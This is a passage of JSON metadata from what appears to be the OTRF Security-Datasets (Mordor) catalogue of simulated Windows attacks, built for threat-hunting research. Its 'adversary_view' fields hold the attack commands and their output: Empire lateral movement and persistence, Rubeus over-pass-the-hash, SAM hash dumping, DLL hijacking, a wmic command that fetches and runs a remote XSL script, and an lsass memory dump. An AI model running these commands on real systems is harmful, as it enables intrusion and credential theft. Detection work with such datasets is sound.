"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_registerxll.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_registerxll.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcelXLL.exe 172.18.39.6 C:\\\\programdata\\calc.xll"}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/"]}, "SDWIN-200921001437": {"title": "Empire Invoke WMI", "id": "SDWIN-200921001437", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/21", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod"], "description": "This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/lateral_movement/invoke_wmi.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-21 04:06:27  http            \n\n(Empire: agents) > interact AWTK7BX5\n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http\n(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_wmi) > info\n\n              Name: Invoke-WMI\n            Module: powershell/lateral_movement/invoke_wmi\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using WMI.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        AWTK7BX5                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserName         False                                 [domain\\]username to use to execute     \n                                                        command.                                \n  Password         False                                 Password to use to execute command.     \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_wmi) > execute\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 3\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi\n(Empire: powershell/lateral_movement/invoke_wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent EHUNP61R checked in\n[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_wmi) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-21 04:14:58  http            \nEHUNP61R ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         9804   5/0.0    2020-09-21 04:14:56  http            \n\n(Empire: agents) > interact EHUNP61R\n(Empire: EHUNP61R) > shell whoami\n[*] Tasked EHUNP61R to run TASK_SHELL\n[*] Agent EHUNP61R tasked with task ID 1\n(Empire: EHUNP61R) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: EHUNP61R) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200921175806": {"title": "Empire Elevated Scheduled Tasks", "id": "SDWIN-200921175806", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/21", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Local Scheduled Tasks"], "description": "This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "schtasks", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["User"], "adversary_view": "Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          \n5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            \nM43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            \n\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:57:21  http            \n\n(Empire: agents) > interact 4SUZ8X62\n(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*\n(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True\n(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated\n(Empire: powershell/persistence/elevated/schtasks) > info\n\n              Name: Invoke-Schtasks\n            Module: powershell/persistence/elevated/schtasks\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) using schtasks running as\n  SYSTEM. This has a moderate detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        4SUZ8X62                  Agent to run module on.                 \n  Listener         False       http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       True                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  DailyTime        False                                 Daily time to trigger the script        \n                                                        (HH:mm).                                \n  IdleTime         False                                 User idle time (in minutes) to trigger  \n                                                        script.                                 \n  OnLogon          False       True                      Switch. Trigger script on user logon.   \n  TaskName         True        MordorElevated            Name to use for the schtask.            \n  RegPath          False       HKLM:\\Software\\Microsoft  Registry location to store the script   \n                              \\Network\\debug            code. Last element is the key name.     \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/schtasks) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT\n[*] Agent 4SUZ8X62 tasked with task ID 1\n[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks\n(Empire: powershell/persistence/elevated/schtasks) > \nSUCCESS: The scheduled task \"MordorElevated\" has successfully been created.\nSchtasks persistence established using listener http stored in HKLM:\\Software\\Microsoft\\Network\\debug with MordorElevated OnLogon trigger.\n\n(Empire: powershell/persistence/elevated/schtasks) > back\n(Empire: 4SUZ8X62) > shell shutdown /r\n[*] Tasked 4SUZ8X62 to run TASK_SHELL\n[*] Agent 4SUZ8X62 tasked with task ID 2\n(Empire: 4SUZ8X62) > \n..Command execution completed.\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y2ADR48N checked in\n[*] New agent D43KCT91 checked in\n[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5\n[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          \n5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            \nM43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            \n\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \nY2ADR48N ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         620    5/0.0    2020-09-21 22:01:50  http            \nD43KCT91 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         636    5/0.0    2020-09-21 22:01:51  http            \n\n(Empire: agents) > "}, "references": null}, "SDWIN-200921230246": {"title": "Rubeus Elevated ASKTGT CreateNetOnly", "id": "SDWIN-200921230246", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Not Touching LSASS"], "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "003", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_createnetonly.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}, {"type": "binary", "name": "Rubeus", "module": "asktgt", "script": "https://github.com/GhostPack/Rubeus"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: G6BYHU4F) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\\Windows\\System32\\cmd.exe\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 4\n(Empire: 4EH9PC5S) > \n______        _                      \n  (_____ \\      | |                     \n  _____) )_   _| |__  _____ _   _  ___ \n  |  __  /| | | |  _ \\| ___ | | | |/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____/|____/|_____)____/(___/\n\n  v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Showing process : False\n[+] Process         : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\n[+] ProcessID       : 10064\n[+] LUID            : 0x42e7ba4\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Target LUID : 70155172\n[*] Building AS-REQ (w/ preauth) for: 'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n      UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB\n      kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t\n      StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4\n      cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc\n      c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8\n      46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61\n      8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ\n      FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h\n      BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl\n      5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W\n      pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb\n      1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9\n      T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a\n      sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd\n      4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa\n      7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q\n      ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO\n      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D\n      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy\n      MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[*] Target LUID: 0x42e7ba4\n[+] Ticket successfully imported!\n\n  ServiceName           :  krbtgt/theshire.local\n  ServiceRealm          :  THESHIRE.LOCAL\n  UserName              :  pgustavo\n  UserRealm             :  THESHIRE.LOCAL\n  StartTime             :  9/21/2020 11:03:07 PM\n  EndTime               :  9/22/2020 9:03:07 AM\n  RenewTill             :  9/28/2020 11:03:07 PM\n  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable\n  KeyType               :  rc4_hmac\n  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==\n\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) > "}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"]}, "SDWIN-200922042230": {"title": "Empire Powerdump Extract Hashes", "id": "SDWIN-200922042230", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/22", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["Calculating SysKey", "SAM Read"], "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "powerdump", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: powershell/credentials/mimikatz/sam) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:21:35  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/powerdump*\n(Empire: powershell/credentials/powerdump) > info\n\n              Name: Invoke-PowerDump\n            Module: powershell/credentials/powerdump\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  DarkOperator\n  winfang\n  Kathy Peters\n  ReL1K\n\nDescription:\n  Dumps hashes from the local system using Posh-SecMod's\n  Invoke-PowerDump\n\nComments:\n  https://github.com/darkoperator/Posh-\n  SecMod/blob/master/PostExploitation/PostExploitation.psm1\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/powerdump) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 4\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/powerdump\n(Empire: powershell/credentials/powerdump) > \nJob started: TASK2D\n\nwardog:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n(Empire: powershell/credentials/powerdump) >"}, "references": null}, "SDWIN-201009173318": {"title": "Covenant Remote WMI Wbemcomn DLL Hijacking", "id": "SDWIN-201009173318", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/09", "modification_date": "2020/10/09", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the WMI provider host (wmiprvse.exe) for lateral movement.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote WMI Wbemcomn DLL Hijack", "link": "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_wbemcomn_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_wbemcomn_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}, {"type": "C2", "name": "Covenant", "module": "Copy", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"}], "permissions_required": ["Administrator"], "adversary_view": "Copy /source:\"C:\\ProgramData\\test.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Windows\\System32\\wbem\\wbemcomn.dll\"\n\nShellCmd /shellcommand:\"wmic /node:WORKSTATION6 os get\""}, "references": ["https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"]}, "SDWIN-201009183000": {"title": "Covenant Remote DCOM Iertutil DLL Hijacking", "id": "SDWIN-201009183000", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/09", "modification_date": "2020/10/09", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the DCOM InternetExplorer.Application class for lateral movement.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote DCOM IErtUtil DLL Hijack", "link": "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_iertutil_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_iertutil_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "PowerShell", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L529"}, {"type": "C2", "name": "Covenant", "module": "Copy", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"}], "permissions_required": ["Administrator"], "adversary_view": "Copy /source:\"C:\\ProgramData\\test2.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Program Files\\Internet Explorer\\iertutil.dll\"\n\nPowerShell /powershellcommand:\"$i=[activator]::CreateInstance([type]::GetTypeFromProgID('InternetExplorer.Application','172.18.39.6'))\""}, "references": ["https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"]}, "SDWIN-201012183248": {"title": "Covenant Wuauclt CreateRemoteThread Execution", "id": "SDWIN-201012183248", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/12", "modification_date": "2020/10/12", "platform": ["Windows"], "type": "atomic", "tags": ["CreateRemoteThread"], "description": "This dataset represents adversaries proxy executing code via the Windows Update client utility. In order to bypass rules looking for the binary reaching out directly to the Internet, this dataset shows the binary creating and running a thread in the virtual address space of another process via the CreateRemoteThread API.", "attack_mappings": [{"technique": "T1218", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Signed Binary Proxy Execution via CreateRemoteThread", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-201012183248.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_lolbin_wuauclt_createremotethread.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["Administrator"], "adversary_view": "Upload /filepath:\"C:\\ProgramData\\SimpleInjection.dll\"\n\nShellCmd /shellcommand:\"C:\\Windows\\System32\\wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\SimpleInjection.dll /RunHandlerComServe\""}, "references": ["https://dtm.uk/wuauclt/"]}, "SDWIN-201017061100": {"title": "WMIC Remote XSL Jscript Execution", "id": "SDWIN-201017061100", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/17", "modification_date": "2020/10/17", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents adversaries proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (jscript).", "attack_mappings": [{"technique": "T1220", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/wmic_remote_xsl_jscript.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "ART", "module": "wmicscript", "script": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"}], "permissions_required": ["Administrator"], "adversary_view": "wmic process list /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\""}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/910a2a764a66b0905065d8bdedb04b37049a85db/atomics/T1220/T1220.md#atomic-test-4---wmic-bypass-using-remote-xsl-file", "https://twitter.com/dez_/status/986614411711442944"]}, "SDWIN-201018195009": {"title": "Lsass Memory Dump via Comsvcs.dll", "id": "SDWIN-201018195009", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/18", "modification_date": "2020/10/18", "platform": ["Windows"], "type": "atomic", "tags": ["art.2536dee2-12fb-459a-8c37-971844fa73be"], "description": "This dataset represents adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_lsass_memory_dump_comsvcs.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Powershell", "module": "Powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full"}, "references": 